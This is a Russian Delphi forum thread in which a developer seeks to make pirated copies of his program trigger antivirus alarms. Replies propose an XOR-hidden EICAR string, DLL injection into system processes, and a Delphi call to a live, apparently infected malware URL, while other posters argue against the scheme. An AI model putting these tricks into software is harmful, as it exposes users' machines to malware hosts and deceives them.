Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 12.09.2013, 15:02   #11
Utkin
Старожил
 
Аватар для Utkin
 
Регистрация: 04.02.2009
Сообщений: 17,351
По умолчанию

Цитата:
Ну а по теме, зашифровать EICAR cстроку чемто несложным, хотябы простым XOR, и при нажатии на кнопку расшифровывать. Может и сработает.
Цитата:
создай пустую dll и делай инжект в системные процессы
Какой-нибудь AVG навсегда тебя отключит от кормушки. Или Аваст отправит в песочницу и начнет спрашивать умные вещи. Благодарные пользователи оставят тонны ненависти в твой адрес .
Маньяк-самоучка
Utkin появился в результате деления на нуль.
Осторожно! Альтернативная логика

Последний раз редактировалось Utkin; 12.09.2013 в 15:04.
Utkin вне форума Ответить с цитированием
Старый 13.09.2013, 03:54   #12
милт
Форумчанин
 
Регистрация: 19.03.2012
Сообщений: 108
По умолчанию

Цитата:
Сообщение от Utkin Посмотреть сообщение
Какой-нибудь AVG навсегда тебя отключит от кормушки. Или Аваст отправит в песочницу и начнет спрашивать умные вещи. Благодарные пользователи оставят тонны ненависти в твой адрес .
Ну это пусть они оставляют тонны ненависти распространителям не лицензионной версии. а я только скажу что надо было качать программу с моего сайта, а не у хакеров

Последний раз редактировалось милт; 13.09.2013 в 04:15.
милт вне форума Ответить с цитированием
Старый 13.09.2013, 04:11   #13
grominfo
Форумчанин
 
Аватар для grominfo
 
Регистрация: 30.05.2011
Сообщений: 651
По умолчанию

Делай запрос к заражённому сайту

Код:
idhttp1.Get('http://78.109.21.42/frooolhs/load.php?id=3486&spl=6');
Антивирус заорёт, и заблокирует ссылку. Чтобы тревога сработала в следующий раз, нужно изменить значение параметра spl, например

[url0]http://78.109.21.42/frooolhs/load.php?id=3486&spl=5[/url0]

Только будет плохо, если у пользователя не стоит антивирус.

Внимание!!!! По ссылкам не переходите, если у вас не стоит ативирус!
Создание, программирование и сопровождение сайтов любой сложности.
Изготовление программ на заказ.
Список услуг и портфолио на сайте www.andreygrom.ru

Последний раз редактировалось Stilet; 13.09.2013 в 08:12.
grominfo вне форума Ответить с цитированием
Старый 13.09.2013, 07:57   #14
ZuBy
Участник клуба
 
Аватар для ZuBy
 
Регистрация: 29.09.2008
Сообщений: 1,234
По умолчанию

Цитата:
Сообщение от grominfo Посмотреть сообщение
Внимание!!!! По ссылкам не переходите, если у вас не стоит ативирус!
У меня не стоит, но запретный плод сладок. Что за сайт?
ZuBy вне форума Ответить с цитированием
Старый 13.09.2013, 08:13   #15
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,097
По умолчанию

Цитата:
Антивирус заорёт
Не заорет если в нем нет WWW модуля.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 13.09.2013, 08:21   #16
grominfo
Форумчанин
 
Аватар для grominfo
 
Регистрация: 30.05.2011
Сообщений: 651
По умолчанию

Цитата:
Что за сайт?
Понятия не имею. У меня антивирь не даёт его открыть. Я первый попавшийся выдернул из поиска, попробовал обратиться к нему через инди, и антивирь сразу закричал.

Цитата:
Не заорет если в нем нет WWW модуля.
Как видно выше, у меня закричал. Аваст
Создание, программирование и сопровождение сайтов любой сложности.
Изготовление программ на заказ.
Список услуг и портфолио на сайте www.andreygrom.ru
grominfo вне форума Ответить с цитированием
Старый 13.09.2013, 08:55   #17
Serge_Bliznykov
Старожил
 
Регистрация: 09.01.2008
Сообщений: 26,229
По умолчанию

Цитата:
Ну это пусть они оставляют тонны ненависти распространителям не лицензионной версии. а я только скажу что надо было качать программу с моего сайта, а не у хакеров
O sancta simplicitas!
1) да кто Вас спрашивать будет?!! пользователи, у которых ваша программа вызвала симптомы вируса?! Да они сразу же её удалят и все остальным порекомендуют к вашим программам (легальным) и близко не подходить.
Мы же все прекрасно знаем, что в 99% случаев, если продукт глючит, то вина в этом разработчика, а не пирата. Когда у Вас винда синий экран выдаёт, Вы кому лучи ненависти отсылаете, неизвестному пирату или компании мелкомягких?! (извините, если обидел Вас подозрением и винда у Вас лицензионная. в ней, конечно же, никаких косяков нет! )

2) если на стене висит ружьё, то оно обязательно выстрелит. Кто Вам гарантирует, что при каких-то условиях Ваша программа У ЛЕГАЛЬНОГО пользователя не решит, что её украли и "не выстрелит" ?! Что Вы будете легальному пользователю объяснять, что это псевдо-вирус в коде, это ошибка?

3) не считайте себя умнее других. Если ваша программа будет действительно представлять интерес, или если она попадёт в руки профи (в антивирусную лабораторию), то в вашем коде будет обнаружена закладка.

Не боитесь дурной славы - welcome!

Цитата:
Делай запрос к заражённому сайту
дык, если программа не должна работать с сетью, файрволлом ей доступ в инет отрубается ПОЛНОСТЬЮ и никаких запросов никуда она не отправляет
Serge_Bliznykov вне форума Ответить с цитированием
Старый 13.09.2013, 11:22   #18
милт
Форумчанин
 
Регистрация: 19.03.2012
Сообщений: 108
По умолчанию

Цитата:
Сообщение от Serge_Bliznykov Посмотреть сообщение
O sancta simplicitas!
1) да кто Вас спрашивать будет?!! пользователи, у которых ваша программа вызвала симптомы вируса?! Да они сразу же её удалят и все остальным порекомендуют к вашим программам (легальным) и близко не подходить.
Мы же все прекрасно знаем, что в 99% случаев, если продукт глючит, то вина в этом разработчика, а не пирата. Когда у Вас винда синий экран выдаёт, Вы кому лучи ненависти отсылаете, неизвестному пирату или компании мелкомягких?! (извините, если обидел Вас подозрением и винда у Вас лицензионная. в ней, конечно же, никаких косяков нет! )

2) если на стене висит ружьё, то оно обязательно выстрелит. Кто Вам гарантирует, что при каких-то условиях Ваша программа У ЛЕГАЛЬНОГО пользователя не решит, что её украли и "не выстрелит" ?! Что Вы будете легальному пользователю объяснять, что это псевдо-вирус в коде, это ошибка?

3) не считайте себя умнее других. Если ваша программа будет действительно представлять интерес, или если она попадёт в руки профи (в антивирусную лабораторию), то в вашем коде будет обнаружена закладка.

Не боитесь дурной славы - welcome!

дык, если программа не должна работать с сетью, файрволлом ей доступ в инет отрубается ПОЛНОСТЬЮ и никаких запросов никуда она не отправляет
1) У меня спрашивают о программе различные вещи в поддержке на сайте и люди которым программа действительно нужна, легко от неё не откажутся.
2) Не выстрелит бывает так что из миллионов комбинаций верна лишь одна единственная и она всегда оказывается верной в нужный момент.
3) как она туда попадёт? может 1 пользователь из 100 её туда отправит.

Программа работает с сетью. во время запуска она обращается с проверкой на сайт. Там смотрит текущее точное время и тд. Но вариант с заражённой ссылкой не совсем подходит, потому что не известно какой там вирус. Вдруг всё таки антивируса не будет

Последний раз редактировалось милт; 13.09.2013 в 11:56.
милт вне форума Ответить с цитированием
Старый 13.09.2013, 14:58   #19
Человек_Борща
Старожил
 
Аватар для Человек_Борща
 
Регистрация: 30.12.2009
Сообщений: 11,426
По умолчанию

Цитата:
1) У меня спрашивают о программе различные вещи в поддержке на сайте и люди которым программа действительно нужна, легко от неё не откажутся.
2) Не выстрелит бывает так что из миллионов комбинаций верна лишь одна единственная и она всегда оказывается верной в нужный момент.
3) как она туда попадёт? может 1 пользователь из 100 её туда отправит.

Программа работает с сетью. во время запуска она обращается с проверкой на сайт. Там смотрит текущее точное время и тд. Но вариант с заражённой ссылкой не совсем подходит, потому что не известно какой там вирус. Вдруг всё таки антивируса не будет
какой наивный

Стоит только кому-то где-то сказать, что вашу программу опознает как вирус, как тут же, 5-10% пользователей отправят образец в лаборатории, 50% тупо её удалят и найдут другой способ решения своих проблем, и будут пропагандировать "На качайте! Вирус отакэ!", остаток просто забьёт на вирус и продолжит использоваться. Нелегалы же просто будут яро пропагандировать "Вирус сожрал меня и мой комп".

И да, политика "Покупайте софт, иначе вас будут заражать вирусом" - отпугивает 500% клиентов из 100% возможных, т.к. откуда лицензионному пользователю знать, что в лицензии нет более хитрого вируса? Поверить на слово? Неа, просто пройдут мимо.

Последний раз редактировалось Человек_Борща; 13.09.2013 в 15:03.
Человек_Борща вне форума Ответить с цитированием
Старый 13.09.2013, 15:49   #20
Vladiger
Пользователь
 
Регистрация: 31.08.2013
Сообщений: 93
По умолчанию

Цитата:
люди которым программа действительно нужна, легко от неё не откажутся.
Ну нада же, какой ажиотаж среди пользователей оного софта!
Боюсь предположить, что же там за программа такая?
Vladiger вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
на счет антивируса..... PooPs Помощь студентам 3 27.12.2012 22:22
Разработка простейшего антивируса C++ Чёрный ветер Помощь студентам 10 18.11.2011 21:25
Выбор антивируса AlterProger Безопасность, Шифрование 1 02.02.2010 22:28
Без антивируса Slavik Безопасность, Шифрование 54 25.05.2009 01:46